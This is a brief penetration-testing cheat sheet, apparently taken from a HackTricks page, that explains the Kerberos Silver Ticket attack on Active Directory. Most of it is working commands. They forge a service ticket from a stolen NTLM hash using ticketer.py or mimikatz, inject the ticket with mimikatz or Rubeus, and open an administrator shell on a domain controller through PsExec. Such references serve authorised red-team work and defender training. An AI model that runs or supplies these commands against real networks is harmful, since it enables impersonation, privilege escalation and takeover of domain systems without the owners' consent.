Silver Ticket

Overview

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user. In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service. The computer accounts reset their passwords every 30 days by default.

Tools needed

• getPac

• ticketer

• mimikatz

• Rubeus

• PSExec (from Sysinternals Suite)

Exploitation

Remote

# Get the ccache file
python ticketer.py -nthash <nthash> -domain-sid <sid> -domain domain.local -spn cifs/dc.domain.local <user>

# Set environment variable
export KRB5CCNAME=user.ccache

# Get shell
python psexec.py domain.local/user@dc.domain.local -k -no-pass

Local

# Create the ticket
mimikatz.exe "kerberos::golden /domain:domain.local /sid:<sid> /rc4:<hash> /user:<user> /service:cifs /target:dc.domain.local"

# Inject in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt ticket.kirbi"
.\Rubeus.exe ptt /ticket:ticket.kirbi

# Get a shell
.\PsExec.exe -accepteula \\dc.domain.local cmd

References

• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket